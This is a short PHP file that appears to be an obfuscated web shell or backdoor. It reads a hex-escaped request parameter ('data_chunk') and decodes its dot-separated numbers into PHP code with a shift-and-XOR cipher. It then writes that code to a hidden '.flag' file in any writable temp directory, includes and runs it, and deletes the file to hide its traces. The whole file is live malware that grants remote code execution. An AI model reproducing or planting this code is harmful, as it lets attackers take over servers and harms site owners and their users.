<?php

if(@$_REQUEST["data_\x63hu\x6E\x6B"] !== null){
	$token = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/tmp", "/dev/shm", getenv("TEMP")]);
	$pointer = $_REQUEST["data_\x63hu\x6E\x6B"];
	 $pointer	= explode	  ('.'		 , $pointer) ; 	
	$flg		= '';
            $s5		= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen		= strlen($s5 );
            $l		= 0;
    
            array_walk($pointer, function ($v6) use (&$flg, &$l, $s5, $sLen) {
                $chS		= ord($s5[$l % $sLen] );
                $d		= ((int)$v6 - $chS - ($l % 10)) ^ 50;
                $flg.=	 chr($d );
                $l++;}	);
	$item = 0;
do {
    $k = $token[$item] ?? null;
    if ($item >= count($token)) break;
    		if (!( !is_dir($k) || !is_writable($k) )) {
    $obj = join("/", [$k, ".flag"]);
    if (@file_put_contents($obj, $flg) !== false) {
	include $obj;
	unlink($obj);
	die();
}
}
    $item++;
} while (true);
}